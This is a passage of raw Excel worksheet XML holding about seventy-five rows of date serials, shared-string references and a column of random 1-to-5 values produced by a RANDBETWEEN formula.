        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="11987" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11987" s="1">
        <v>43309.44091435185</v>
      </c>
      <c r="C11987" t="s">
        <v>454</v>
      </c>
      <c r="D11987" t="s">
        <v>41</v>
      </c>
      <c r="E11987" t="s">
        <v>10754</v>
      </c>
      <c r="F11987">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="11988" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11988" s="1">
        <v>43309.373576388891</v>
      </c>
      <c r="C11988" t="s">
        <v>454</v>
      </c>
      <c r="E11988" t="s">
        <v>10755</v>
      </c>
      <c r="F11988">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="11989" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A11989" s="1">
        <v>43309.369328703702</v>
      </c>
      <c r="C11989" t="s">
        <v>17</v>
      </c>
      <c r="D11989" t="s">
        <v>251</v>
      </c>
      <c r="E11989" s="2" t="s">
        <v>10756</v>
      </c>
      <c r="F11989">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="11990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11990" s="1">
        <v>43309.316817129627</v>
      </c>
      <c r="C11990" t="s">
        <v>3106</v>
      </c>
      <c r="D11990" t="s">
        <v>71</v>
      </c>
      <c r="E11990" t="s">
        <v>10757</v>
      </c>
      <c r="F11990">
        <f t="shared" ca="1" si="187"/>
        <v>2</v>
      </c>
    </row>
    <row r="11991" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11991" s="1">
        <v>43309.289641203701</v>
      </c>
      <c r="C11991" t="s">
        <v>454</v>
      </c>
      <c r="D11991" t="s">
        <v>6</v>
      </c>
      <c r="E11991" t="s">
        <v>10754</v>
      </c>
      <c r="F11991">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="11992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11992" s="1">
        <v>43309.248148148145</v>
      </c>
      <c r="C11992" t="s">
        <v>82</v>
      </c>
      <c r="D11992" t="s">
        <v>667</v>
      </c>
      <c r="E11992" t="s">
        <v>9877</v>
      </c>
      <c r="F11992">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="11993" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11993" s="1">
        <v>43309.216840277775</v>
      </c>
      <c r="C11993" t="s">
        <v>2104</v>
      </c>
      <c r="D11993" t="s">
        <v>1993</v>
      </c>
      <c r="E11993" t="s">
        <v>9877</v>
      </c>
      <c r="F11993">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="11994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11994" s="1">
        <v>43309.206412037034</v>
      </c>
      <c r="C11994" t="s">
        <v>454</v>
      </c>
      <c r="D11994" t="s">
        <v>721</v>
      </c>
      <c r="E11994" t="s">
        <v>10748</v>
      </c>
      <c r="F11994">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="11995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11995" s="1">
        <v>43309.205775462964</v>
      </c>
      <c r="C11995" t="s">
        <v>454</v>
      </c>
      <c r="D11995" t="s">
        <v>330</v>
      </c>
      <c r="E11995" t="s">
        <v>10746</v>
      </c>
      <c r="F11995">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="11996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11996" s="1">
        <v>43309.187847222223</v>
      </c>
      <c r="C11996" t="s">
        <v>4500</v>
      </c>
      <c r="E11996" t="s">
        <v>10758</v>
      </c>
      <c r="F11996">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="11997" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11997" s="1">
        <v>43309.13181712963</v>
      </c>
      <c r="C11997" t="s">
        <v>10</v>
      </c>
      <c r="D11997" t="s">
        <v>17</v>
      </c>
      <c r="E11997" t="s">
        <v>10759</v>
      </c>
      <c r="F11997">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="11998" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11998" s="1">
        <v>43309.116643518515</v>
      </c>
      <c r="C11998" t="s">
        <v>3106</v>
      </c>
      <c r="D11998" t="s">
        <v>46</v>
      </c>
      <c r="E11998" t="s">
        <v>10760</v>
      </c>
      <c r="F11998">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="11999" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A11999" s="1">
        <v>43309.025601851848</v>
      </c>
      <c r="C11999" t="s">
        <v>29</v>
      </c>
      <c r="D11999" t="s">
        <v>263</v>
      </c>
      <c r="E11999" s="2" t="s">
        <v>10761</v>
      </c>
      <c r="F11999">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12000" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12000" s="1">
        <v>43308.979687500003</v>
      </c>
      <c r="C12000" t="s">
        <v>479</v>
      </c>
      <c r="D12000" t="s">
        <v>251</v>
      </c>
      <c r="E12000" s="2" t="s">
        <v>10762</v>
      </c>
      <c r="F12000">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12001" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A12001" s="1">
        <v>43308.945520833331</v>
      </c>
      <c r="C12001" t="s">
        <v>178</v>
      </c>
      <c r="D12001" t="s">
        <v>713</v>
      </c>
      <c r="E12001" s="2" t="s">
        <v>10763</v>
      </c>
      <c r="F12001">
        <f t="shared" ca="1" si="187"/>
        <v>2</v>
      </c>
    </row>
    <row r="12002" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12002" s="1">
        <v>43308.827928240738</v>
      </c>
      <c r="C12002" t="s">
        <v>454</v>
      </c>
      <c r="D12002" t="s">
        <v>82</v>
      </c>
      <c r="E12002" t="s">
        <v>10746</v>
      </c>
      <c r="F12002">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="12003" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12003" s="1">
        <v>43308.824675925927</v>
      </c>
      <c r="C12003" t="s">
        <v>454</v>
      </c>
      <c r="D12003" t="s">
        <v>222</v>
      </c>
      <c r="E12003" t="s">
        <v>10754</v>
      </c>
      <c r="F12003">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="12004" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12004" s="1">
        <v>43308.809976851851</v>
      </c>
      <c r="C12004" t="s">
        <v>454</v>
      </c>
      <c r="D12004" t="s">
        <v>39</v>
      </c>
      <c r="E12004" t="s">
        <v>10748</v>
      </c>
      <c r="F12004">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12005" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12005" s="1">
        <v>43308.784224537034</v>
      </c>
      <c r="C12005" t="s">
        <v>69</v>
      </c>
      <c r="D12005" t="s">
        <v>494</v>
      </c>
      <c r="E12005" s="2" t="s">
        <v>10764</v>
      </c>
      <c r="F12005">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12006" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12006" s="1">
        <v>43308.731874999998</v>
      </c>
      <c r="C12006" t="s">
        <v>17</v>
      </c>
      <c r="D12006" t="s">
        <v>114</v>
      </c>
      <c r="E12006" s="2" t="s">
        <v>10756</v>
      </c>
      <c r="F12006">
        <f t="shared" ca="1" si="187"/>
        <v>2</v>
      </c>
    </row>
    <row r="12007" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12007" s="1">
        <v>43308.719224537039</v>
      </c>
      <c r="C12007" t="s">
        <v>10</v>
      </c>
      <c r="D12007" t="s">
        <v>271</v>
      </c>
      <c r="E12007" s="2" t="s">
        <v>10765</v>
      </c>
      <c r="F12007">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12008" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12008" s="1">
        <v>43308.718287037038</v>
      </c>
      <c r="C12008" t="s">
        <v>10</v>
      </c>
      <c r="D12008" t="s">
        <v>271</v>
      </c>
      <c r="E12008" s="2" t="s">
        <v>10766</v>
      </c>
      <c r="F12008">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="12009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12009" s="1">
        <v>43308.718252314815</v>
      </c>
      <c r="C12009" t="s">
        <v>10</v>
      </c>
      <c r="D12009" t="s">
        <v>86</v>
      </c>
      <c r="E12009" t="s">
        <v>10767</v>
      </c>
      <c r="F12009">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="12010" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12010" s="1">
        <v>43308.69017361111</v>
      </c>
      <c r="C12010" t="s">
        <v>10</v>
      </c>
      <c r="D12010" t="s">
        <v>80</v>
      </c>
      <c r="E12010" s="2" t="s">
        <v>10768</v>
      </c>
      <c r="F12010">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="12011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12011" s="1">
        <v>43308.646319444444</v>
      </c>
      <c r="C12011" t="s">
        <v>10</v>
      </c>
      <c r="D12011" t="s">
        <v>192</v>
      </c>
      <c r="E12011" t="s">
        <v>10769</v>
      </c>
      <c r="F12011">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="12012" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12012" s="1">
        <v>43308.634108796294</v>
      </c>
      <c r="C12012" t="s">
        <v>10</v>
      </c>
      <c r="D12012" t="s">
        <v>52</v>
      </c>
      <c r="E12012" t="s">
        <v>10770</v>
      </c>
      <c r="F12012">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="12013" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A12013" s="1">
        <v>43308.629652777781</v>
      </c>
      <c r="C12013" t="s">
        <v>10</v>
      </c>
      <c r="D12013" t="s">
        <v>192</v>
      </c>
      <c r="E12013" s="2" t="s">
        <v>10771</v>
      </c>
      <c r="F12013">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12014" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A12014" s="1">
        <v>43308.614259259259</v>
      </c>
      <c r="C12014" t="s">
        <v>43</v>
      </c>
      <c r="D12014" t="s">
        <v>263</v>
      </c>
      <c r="E12014" s="2" t="s">
        <v>10772</v>
      </c>
      <c r="F12014">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12015" s="1">
        <v>43308.612210648149</v>
      </c>
      <c r="C12015" t="s">
        <v>6</v>
      </c>
      <c r="D12015" t="s">
        <v>7</v>
      </c>
      <c r="E12015" t="s">
        <v>10773</v>
      </c>
      <c r="F12015">
        <f t="shared" ca="1" si="187"/>
        <v>2</v>
      </c>
    </row>
    <row r="12016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12016" s="1">
        <v>43308.611967592595</v>
      </c>
      <c r="C12016" t="s">
        <v>10</v>
      </c>
      <c r="D12016" t="s">
        <v>263</v>
      </c>
      <c r="E12016" t="s">
        <v>10774</v>
      </c>
      <c r="F12016">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="12017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12017" s="1">
        <v>43308.59988425926</v>
      </c>
      <c r="C12017" t="s">
        <v>10</v>
      </c>
      <c r="D12017" t="s">
        <v>36</v>
      </c>
      <c r="E12017" t="s">
        <v>10775</v>
      </c>
      <c r="F12017">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="12018" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12018" s="1">
        <v>43308.595868055556</v>
      </c>
      <c r="C12018" t="s">
        <v>6</v>
      </c>
      <c r="D12018" t="s">
        <v>25</v>
      </c>
      <c r="E12018" t="s">
        <v>10776</v>
      </c>
      <c r="F12018">
        <f t="shared" ca="1" si="187"/>
        <v>2</v>
      </c>
    </row>
    <row r="12019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12019" s="1">
        <v>43308.593055555553</v>
      </c>
      <c r="C12019" t="s">
        <v>10</v>
      </c>
      <c r="D12019" t="s">
        <v>17</v>
      </c>
      <c r="E12019" t="s">
        <v>10777</v>
      </c>
      <c r="F12019">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="12020" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12020" s="1">
        <v>43308.578761574077</v>
      </c>
      <c r="C12020" t="s">
        <v>6</v>
      </c>
      <c r="E12020" s="2" t="s">
        <v>10778</v>
      </c>
      <c r="F12020">
        <f t="shared" ca="1" si="187"/>
        <v>1</v>
      </c>
    </row>
    <row r="12021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12021" s="1">
        <v>43308.578125</v>
      </c>
      <c r="C12021" t="s">
        <v>6</v>
      </c>
      <c r="D12021" t="s">
        <v>25</v>
      </c>
      <c r="E12021" t="s">
        <v>10779</v>
      </c>
      <c r="F12021">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12022" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12022" s="1">
        <v>43308.571875000001</v>
      </c>
      <c r="C12022" t="s">
        <v>10</v>
      </c>
      <c r="D12022" t="s">
        <v>80</v>
      </c>
      <c r="E12022" s="2" t="s">
        <v>10780</v>
      </c>
      <c r="F12022">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="12023" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12023" s="1">
        <v>43308.564270833333</v>
      </c>
      <c r="C12023" t="s">
        <v>220</v>
      </c>
      <c r="D12023" t="s">
        <v>1993</v>
      </c>
      <c r="E12023" s="2" t="s">
        <v>10781</v>
      </c>
      <c r="F12023">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12024" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12024" s="1">
        <v>43308.558229166665</v>
      </c>
      <c r="C12024" t="s">
        <v>10</v>
      </c>
      <c r="D12024" t="s">
        <v>178</v>
      </c>
      <c r="E12024" s="2" t="s">
        <v>10782</v>
      </c>
      <c r="F12024">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="12025" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12025" s="1">
        <v>43308.547303240739</v>
      </c>
      <c r="C12025" t="s">
        <v>10</v>
      </c>
      <c r="D12025" t="s">
        <v>86</v>
      </c>
      <c r="E12025" t="s">
        <v>10783</v>
      </c>
      <c r="F12025">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12026" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12026" s="1">
        <v>43308.544502314813</v>
      </c>
      <c r="C12026" t="s">
        <v>10</v>
      </c>
      <c r="D12026" t="s">
        <v>89</v>
      </c>
      <c r="E12026" t="s">
        <v>10784</v>
      </c>
      <c r="F12026">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12027" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A12027" s="1">
        <v>43308.522627314815</v>
      </c>
      <c r="C12027" t="s">
        <v>10</v>
      </c>
      <c r="D12027" t="s">
        <v>89</v>
      </c>
      <c r="E12027" s="2" t="s">
        <v>10785</v>
      </c>
      <c r="F12027">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12028" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A12028" s="1">
        <v>43308.522037037037</v>
      </c>
      <c r="C12028" t="s">
        <v>10</v>
      </c>
      <c r="D12028" t="s">
        <v>89</v>
      </c>
      <c r="E12028" s="2" t="s">
        <v>10786</v>
      </c>
      <c r="F12028">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12029" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A12029" s="1">
        <v>43308.510520833333</v>
      </c>
      <c r="C12029" t="s">
        <v>3515</v>
      </c>
      <c r="D12029" t="s">
        <v>271</v>
      </c>
      <c r="E12029" s="2" t="s">
        <v>10787</v>
      </c>
      <c r="F12029">
        <f t="shared" ca="1" si="187"/>
        <v>3</v>
      </c>
    </row>
    <row r="12030" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12030" s="1">
        <v>43308.437858796293</v>
      </c>
      <c r="C12030" t="s">
        <v>10</v>
      </c>
      <c r="D12030" t="s">
        <v>112</v>
      </c>
      <c r="E12030" t="s">
        <v>10788</v>
      </c>
      <c r="F12030">
        <f t="shared" ca="1" si="187"/>
        <v>2</v>
      </c>
    </row>
    <row r="12031" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12031" s="1">
        <v>43308.414340277777</v>
      </c>
      <c r="C12031" t="s">
        <v>10</v>
      </c>
      <c r="D12031" t="s">
        <v>14</v>
      </c>
      <c r="E12031" t="s">
        <v>10789</v>
      </c>
      <c r="F12031">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="12032" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A12032" s="1">
        <v>43308.402557870373</v>
      </c>
      <c r="C12032" t="s">
        <v>1501</v>
      </c>
      <c r="E12032" s="2" t="s">
        <v>10790</v>
      </c>
      <c r="F12032">
        <f t="shared" ca="1" si="187"/>
        <v>4</v>
      </c>
    </row>
    <row r="12033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12033" s="1">
        <v>43308.399745370371</v>
      </c>
      <c r="C12033" t="s">
        <v>6</v>
      </c>
      <c r="D12033" t="s">
        <v>25</v>
      </c>
      <c r="E12033" t="s">
        <v>10791</v>
      </c>
      <c r="F12033">
        <f t="shared" ca="1" si="187"/>
        <v>5</v>
      </c>
    </row>
    <row r="12034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12034" s="1">
        <v>43308.375810185185</v>
      </c>
      <c r="C12034" t="s">
        <v>10</v>
      </c>
      <c r="D12034" t="s">
        <v>6</v>
      </c>
      <c r="E12034" t="s">
        <v>10792</v>
      </c>
      <c r="F12034">
        <f t="shared" ref="F12034:F12097" ca="1" si="188">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="12035" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12035" s="1">
        <v>43308.375694444447</v>
      </c>
      <c r="C12035" t="s">
        <v>3106</v>
      </c>
      <c r="D12035" t="s">
        <v>290</v>
      </c>
      <c r="E12035" t="s">
        <v>10793</v>
      </c>
      <c r="F12035">
        <f t="shared" ca="1" si="188"/>
        <v>5</v>
      </c>
    </row>
    <row r="12036" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12036" s="1">
        <v>43308.375358796293</v>
      </c>
      <c r="C12036" t="s">
        <v>41</v>
      </c>
      <c r="D12036" t="s">
        <v>41</v>
      </c>
      <c r="E12036" t="s">
        <v>10794</v>
      </c>
      <c r="F12036">
        <f t="shared" ca="1" si="188"/>
        <v>1</v>
      </c>
    </row>
    <row r="12037" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12037" s="1">
        <v>43308.345995370371</v>
      </c>
      <c r="C12037" t="s">
        <v>10</v>
      </c>
      <c r="D12037" t="s">
        <v>163</v>
      </c>
      <c r="E12037" t="s">
        <v>10795</v>
      </c>
      <c r="F12037">
        <f t="shared" ca="1" si="188"/>
        <v>1</v>
      </c>
    </row>
    <row r="12038" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12038" s="1">
        <v>43308.3283912037</v>
      </c>
      <c r="C12038" t="s">
        <v>41</v>
      </c>
      <c r="E12038" t="s">
        <v>10796</v>
      </c>
      <c r="F12038">
        <f t="shared" ca="1" si="188"/>
        <v>4</v>
      </c>
    </row>
    <row r="12039" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12039" s="1">
        <v>43308.286215277774</v>
      </c>
      <c r="C12039" t="s">
        <v>41</v>
      </c>
      <c r="E12039" s="2" t="s">
        <v>10797</v>
      </c>
      <c r="F12039">
        <f t="shared" ca="1" si="188"/>
        <v>1</v>
      </c>
    </row>
    <row r="12040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12040" s="1">
        <v>43308.248842592591</v>
      </c>
      <c r="C12040" t="s">
        <v>845</v>
      </c>
      <c r="D12040" t="s">
        <v>817</v>
      </c>
      <c r="E12040" t="s">
        <v>9877</v>
      </c>
      <c r="F12040">
        <f t="shared" ca="1" si="188"/>
        <v>1</v>
      </c>
    </row>
    <row r="12041" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12041" s="1">
        <v>43308.248680555553</v>
      </c>
      <c r="C12041" t="s">
        <v>10735</v>
      </c>
      <c r="D12041" t="s">
        <v>23</v>
      </c>
      <c r="E12041" t="s">
        <v>9877</v>
      </c>
      <c r="F12041">
        <f t="shared" ca="1" si="188"/>
        <v>3</v>
      </c>
    </row>
    <row r="12042" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A12042" s="1">
        <v>43308.235219907408</v>
      </c>
      <c r="C12042" t="s">
        <v>430</v>
      </c>
      <c r="E12042" s="2" t="s">
        <v>10798</v>
      </c>
      <c r="F12042">
        <f t="shared" ca="1" si="188"/>
        <v>2</v>
      </c>
    </row>
    <row r="12043" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12043" s="1">
        <v>43308.22351851852</v>
      </c>
      <c r="C12043" t="s">
        <v>319</v>
      </c>
      <c r="D12043" t="s">
        <v>320</v>
      </c>
      <c r="E12043" t="s">
        <v>10799</v>
      </c>
      <c r="F12043">
        <f t="shared" ca="1" si="188"/>
        <v>2</v>
      </c>
    </row>
    <row r="12044" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12044" s="1">
        <v>43308.20821759259</v>
      </c>
      <c r="C12044" t="s">
        <v>1812</v>
      </c>
      <c r="D12044" t="s">
        <v>1056</v>
      </c>
      <c r="E12044" t="s">
        <v>9877</v>
      </c>
      <c r="F12044">
        <f t="shared" ca="1" si="188"/>
        <v>1</v>
      </c>
    </row>
    <row r="12045" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12045" s="1">
        <v>43308.164861111109</v>
      </c>
      <c r="C12045" t="s">
        <v>73</v>
      </c>
      <c r="E12045" s="2" t="s">
        <v>10800</v>
      </c>
      <c r="F12045">
        <f t="shared" ca="1" si="188"/>
        <v>1</v>
      </c>
    </row>
    <row r="12046" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12046" s="1">
        <v>43308.111875000002</v>
      </c>
      <c r="C12046" t="s">
        <v>253</v>
      </c>
      <c r="E12046" t="s">
        <v>10801</v>
      </c>
      <c r="F12046">
        <f t="shared" ca="1" si="188"/>
        <v>5</v>
      </c>
    </row>
    <row r="12047" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12047" s="1">
        <v>43308.098055555558</v>
      </c>
      <c r="C12047" t="s">
        <v>71</v>
      </c>
      <c r="E12047" s="2" t="s">
        <v>10802</v>
      </c>
      <c r="F12047">
        <f t="shared" ca="1" si="188"/>
        <v>3</v>
      </c>
    </row>
    <row r="12048" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12048" s="1">
        <v>43308.076886574076</v>
      </c>
      <c r="C12048" t="s">
        <v>461</v>
      </c>
      <c r="D12048" t="s">
        <v>374</v>
      </c>
      <c r="E12048" t="s">
        <v>9309</v>
      </c>
      <c r="F12048">
        <f t="shared" ca="1" si="188"/>
        <v>4</v>
      </c>
    </row>
    <row r="12049" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A12049" s="1">
        <v>43307.962037037039</v>
      </c>
      <c r="C12049" t="s">
        <v>2733</v>
      </c>
      <c r="D12049" t="s">
        <v>1993</v>
      </c>
      <c r="E12049" s="2" t="s">
        <v>10803</v>
      </c>
      <c r="F12049">
        <f t="shared" ca="1" si="188"/>
        <v>4</v>
      </c>
    </row>
    <row r="12050" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12050" s="1">
        <v>43307.923622685186</v>
      </c>
      <c r="C12050" t="s">
        <v>10132</v>
      </c>
      <c r="D12050" t="s">
        <v>263</v>
      </c>
      <c r="E12050" s="2" t="s">
        <v>10804</v>
      </c>
      <c r="F12050">
        <f t="shared" ca="1" si="188"/>
        <v>5</v>
      </c>
    </row>
    <row r="12051" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12051" s="1">
        <v>43307.904513888891</v>
      </c>
      <c r="C12051" t="s">
        <v>253</v>
      </c>
      <c r="E12051" t="s">
        <v>10805</v>
      </c>
      <c r="F12051">
        <f t="shared" ca="1" si="188"/>
        <v>1</v>
      </c>
    </row>
    <row r="12052" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12052" s="1">
        <v>43307.840601851851</v>
      </c>
      <c r="C12052" t="s">
        <v>140</v>
      </c>
      <c r="E12052" s="2" t="s">
        <v>10806</v>
      </c>
      <c r="F12052">
        <f t="shared" ca="1" si="188"/>
        <v>4</v>
      </c>
    </row>
    <row r="12053" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12053" s="1">
        <v>43307.839479166665</v>
      </c>
      <c r="C12053" t="s">
        <v>290</v>
      </c>
      <c r="D12053" t="s">
        <v>124</v>
      </c>
      <c r="E12053" s="2" t="s">
        <v>10807</v>
      </c>
      <c r="F12053">
        <f t="shared" ca="1" si="188"/>
        <v>4</v>
      </c>
    </row>
    <row r="12054" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A12054" s="1">
        <v>43307.8046412037</v>
      </c>
      <c r="C12054" t="s">
        <v>10</v>
      </c>
      <c r="D12054" t="s">
        <v>33</v>
      </c>
      <c r="E12054" s="2" t="s">
        <v>10808</v>
      </c>
      <c r="F12054">
        <f t="shared" ca="1" si="188"/>
        <v>1</v>
      </c>
    </row>
    <row r="12055" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12055" s="1">
        <v>43307.786909722221</v>
      </c>
      <c r="C12055" t="s">
        <v>124</v>
      </c>
      <c r="D12055" t="s">
        <v>480</v>
      </c>
      <c r="E12055" s="2" t="s">
        <v>10809</v>
      </c>
      <c r="F12055">
        <f t="shared" ca="1" si="188"/>
        <v>2</v>
      </c>
    </row>
    <row r="12056" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12056" s="1">
        <v>43307.741550925923</v>
      </c>
      <c r="C12056" t="s">
        <v>10</v>
      </c>
      <c r="D12056" t="s">
        <v>89</v>
      </c>
      <c r="E12056" t="s">
        <v>10810</v>
      </c>
      <c r="F12056">
        <f t="shared" ca="1" si="188"/>
        <v>5</v>
      </c>
    </row>
    <row r="12057" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12057" s="1">
        <v>43307.690659722219</v>
      </c>
      <c r="C12057" t="s">
        <v>3106</v>
      </c>
      <c r="D12057" t="s">
        <v>2139</v>
      </c>
      <c r="E12057" t="s">
        <v>10811</v>
      </c>
      <c r="F12057">
        <f t="shared" ca="1" si="188"/>
        <v>4</v>
      </c>
    </row>
    <row r="12058" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12058" s="1">
        <v>43307.687442129631</v>
      </c>
      <c r="C12058" t="s">
        <v>3106</v>
      </c>
      <c r="D12058" t="s">
        <v>163</v>
      </c>
      <c r="E12058" t="s">
        <v>10812</v>
      </c>
      <c r="F12058">
        <f t="shared" ca="1" si="188"/>
        <v>3</v>
      </c>
    </row>
    <row r="12059" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12059" s="1">
        <v>43307.687118055554</v>
      </c>
      <c r="C12059" t="s">
        <v>10</v>
      </c>
      <c r="D12059" t="s">
        <v>71</v>
      </c>
      <c r="E12059" t="s">
        <v>10813</v>
      </c>
      <c r="F12059">
        <f t="shared" ca="1" si="188"/>
        <v>3</v>
      </c>
    </row>
    <row r="12060" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12060" s="1">
        <v>43307.68310185185</v>
      </c>
      <c r="C12060" t="s">
        <v>328</v>
      </c>
      <c r="E12060" s="2" t="s">
        <v>10814</v>
      </c>
      <c r="F12060">
        <f t="shared" ca="1" si="188"/>
        <v>3</v>
      </c>
    </row>
    <row r="12061" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12061" s="1">
        <v>43307.674016203702</v>
      </c>
      <c r="C12061" t="s">
        <v>10</v>
      </c>
      <c r="D12061" t="s">
        <v>158</v>
      </c>
      <c r="E12061" s="2" t="s">
        <v>10815</v>
      </c>
      <c r="F12061">
        <f t="shared" ca="1" si="188"/>
        <v>5</v>
      </c>
    </row>
    <row r="12062" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12062" s="1">
        <v>43307.637719907405</v>
      </c>
